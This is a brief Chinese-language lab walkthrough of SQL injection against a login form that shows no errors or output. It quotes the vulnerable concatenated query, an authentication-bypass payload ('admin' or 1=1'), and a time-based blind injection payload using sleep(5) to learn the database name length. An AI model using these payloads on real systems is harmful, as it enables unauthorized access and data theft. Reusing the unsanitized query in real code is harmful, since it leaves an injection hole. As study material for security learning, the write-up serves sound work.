1、无论输入啥似乎都没反应没有回显没有报错。直接查看后台代码,发现其就是一个单引号,只不过没有各种回显。
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
尝试了下万能密码 admin’ or 1=1 or ‘1’=’1,顺利登录。 那么问题来了,这种怎么爆表呢?没有回显也没有报错,首先想到就该是时间盲注。这里构造如下 admin’ and if(length(database())=8,sleep(5),1)#, 那么其sql语句就是
@$sql="SELECT username, password FROM users WHERE username='admin' and if(length(database())=8,sleep(5),1)#' and password='$passwd' LIMIT 0,1";
如果数据库名的长度为8,则延迟5秒钟,否则直接登录。
成功pending 5 秒钟。